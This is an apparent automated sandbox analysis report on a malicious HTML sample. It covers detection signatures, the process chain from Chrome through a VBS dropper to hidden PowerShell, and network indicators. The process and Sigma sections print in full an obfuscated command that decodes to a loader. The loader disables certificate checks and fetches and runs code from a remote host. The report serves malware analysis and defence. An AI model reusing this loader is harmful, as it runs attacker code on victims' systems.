Edit tour

Windows Analysis Report
CfF7MWq7aG.html

Overview

General Information

Sample name:CfF7MWq7aG.html
(renamed file extension from none to html, renamed because original name is a hash value)
Original sample name:9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc
Analysis ID:1607145
MD5:b235a6019e401173f74c6b6487bc5c50
SHA1:0050ea0f086beffecaee1eba84d7e8f6d907d93e
SHA256:9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc
Infos:

Detection

Score:92
Range:0 - 100
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 4940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\CfF7MWq7aG.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • unarchiver.exe (PID: 6716 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6744 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6812 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 6884 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 7036 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 54.39.156.32, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49748
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System3
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 54.39.156.32, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49748
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine|base64offset|contains: hv, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7036, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, ProcessId: 7104, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: CfF7MWq7aG.htmlHTTP Parser: Low number of body elements: 0
Source: CfF7MWq7aG.htmlHTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\LICENSE.txtJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
Source: unknownHTTPS traffic detected: 54.39.156.32:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.0.dr

Software Vulnerabilities

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 54.39.156.32 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:49740 -> 45.93.9.167:15322
Source: global trafficTCP traffic: 192.168.2.4:56878 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 54.39.156.32 54.39.156.32
Source: Joe Sandbox ViewIP Address: 142.4.219.198 142.4.219.198
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1Host: s4.histats.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1Host: s4.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s4.histats.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: s4.histats.com
Source: global trafficDNS traffic detected: DNS query: host85500.info
Source: global trafficDNS traffic detected: DNS query: _15322._https.host85500.info
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: sets.json.0.drString found in binary or memory: https://07c225f3.online
Source: optimization-hints.pb.0.drString found in binary or memory: https://123milhas.com/v2/busca/confirmacao-pedido/.
Source: sets.json.0.drString found in binary or memory: https://24.hu
Source: sets.json.0.drString found in binary or memory: https://aajtak.in
Source: sets.json.0.drString found in binary or memory: https://abczdrowie.pl
Source: sets.json.0.drString found in binary or memory: https://alice.tw
Source: sets.json.0.drString found in binary or memory: https://ambitionbox.com
Source: sets.json.0.drString found in binary or memory: https://autobild.de
Source: sets.json.0.drString found in binary or memory: https://baomoi.com
Source: sets.json.0.drString found in binary or memory: https://bild.de
Source: sets.json.0.drString found in binary or memory: https://blackrock.com
Source: sets.json.0.drString found in binary or memory: https://blackrockadvisorelite.it
Source: sets.json.0.drString found in binary or memory: https://bluradio.com
Source: sets.json.0.drString found in binary or memory: https://bolasport.com
Source: sets.json.0.drString found in binary or memory: https://bonvivir.com
Source: sets.json.0.drString found in binary or memory: https://bumbox.com
Source: sets.json.0.drString found in binary or memory: https://businessinsider.com.pl
Source: sets.json.0.drString found in binary or memory: https://businesstoday.in
Source: sets.json.0.drString found in binary or memory: https://cachematrix.com
Source: sets.json.0.drString found in binary or memory: https://cafemedia.com
Source: sets.json.0.drString found in binary or memory: https://caracoltv.com
Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.be
Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.com
Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.fr
Source: sets.json.0.drString found in binary or memory: https://cardsayings.net
Source: sets.json.0.drString found in binary or memory: https://chatbot.com
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout-new.dafiti.com.br/success/index.html.
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout.casasbahia.com.br/compra-finalizada
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout.extra.com.br/compra-finalizada
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout.pontofrio.com.br/compra-finalizada
Source: sets.json.0.drString found in binary or memory: https://chennien.com
Source: sets.json.0.drString found in binary or memory: https://citybibleforum.org
Source: sets.json.0.drString found in binary or memory: https://clarosports.com
Source: sets.json.0.drString found in binary or memory: https://clmbtech.com
Source: sets.json.0.drString found in binary or memory: https://closeronline.co.uk
Source: sets.json.0.drString found in binary or memory: https://clubelpais.com.uy
Source: sets.json.0.drString found in binary or memory: https://cmxd.com.mx
Source: sets.json.0.drString found in binary or memory: https://cognitive-ai.ru
Source: sets.json.0.drString found in binary or memory: https://cognitiveai.ru
Source: sets.json.0.drString found in binary or memory: https://commentcamarche.com
Source: sets.json.0.drString found in binary or memory: https://commentcamarche.net
Source: optimization-hints.pb.0.drString found in binary or memory: https://comprasegura.olx.com.br/
Source: optimization-hints.pb.0.drString found in binary or memory: https://comprasegura.olx.com.br/pedidos/.
Source: sets.json.0.drString found in binary or memory: https://computerbild.de
Source: sets.json.0.drString found in binary or memory: https://content-loader.com
Source: sets.json.0.drString found in binary or memory: https://cookreactor.com
Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: sets.json.0.drString found in binary or memory: https://cricbuzz.com
Source: sets.json.0.drString found in binary or memory: https://css-load.com
Source: sets.json.0.drString found in binary or memory: https://deccoria.pl
Source: sets.json.0.drString found in binary or memory: https://deere.com
Source: sets.json.0.drString found in binary or memory: https://desimartini.com
Source: sets.json.0.drString found in binary or memory: https://dewarmsteweek.be
Source: sets.json.0.drString found in binary or memory: https://drimer.io
Source: sets.json.0.drString found in binary or memory: https://drimer.travel
Source: optimization-hints.pb.0.drString found in binary or memory: https://dump-truck.appspot.com/.
Source: LICENSE.txt.0.drString found in binary or memory: https://easylist.to/)
Source: sets.json.0.drString found in binary or memory: https://economictimes.com
Source: sets.json.0.drString found in binary or memory: https://een.be
Source: sets.json.0.drString found in binary or memory: https://efront.com
Source: sets.json.0.drString found in binary or memory: https://eleconomista.net
Source: sets.json.0.drString found in binary or memory: https://elfinancierocr.com
Source: sets.json.0.drString found in binary or memory: https://elgrafico.com
Source: sets.json.0.drString found in binary or memory: https://ella.sv
Source: sets.json.0.drString found in binary or memory: https://elpais.com.uy
Source: sets.json.0.drString found in binary or memory: https://elpais.uy
Source: optimization-hints.pb.0.drString found in binary or memory: https://emv-qr.googleplex.com/.
Source: sets.json.0.drString found in binary or memory: https://etfacademy.it
Source: sets.json.0.drString found in binary or memory: https://eworkbookcloud.com
Source: sets.json.0.drString found in binary or memory: https://eworkbookrequest.com
Source: sets.json.0.drString found in binary or memory: https://fakt.pl
Source: sets.json.0.drString found in binary or memory: https://finn.no
Source: sets.json.0.drString found in binary or memory: https://firstlook.biz
Source: sets.json.0.drString found in binary or memory: https://gallito.com.uy
Source: sets.json.0.drString found in binary or memory: https://geforcenow.com
Source: sets.json.0.drString found in binary or memory: https://gettalkdesk.com
Source: LICENSE.txt.0.drString found in binary or memory: https://github.com/easylist)
Source: sets.json.0.drString found in binary or memory: https://gliadomain.com
Source: sets.json.0.drString found in binary or memory: https://gnttv.com
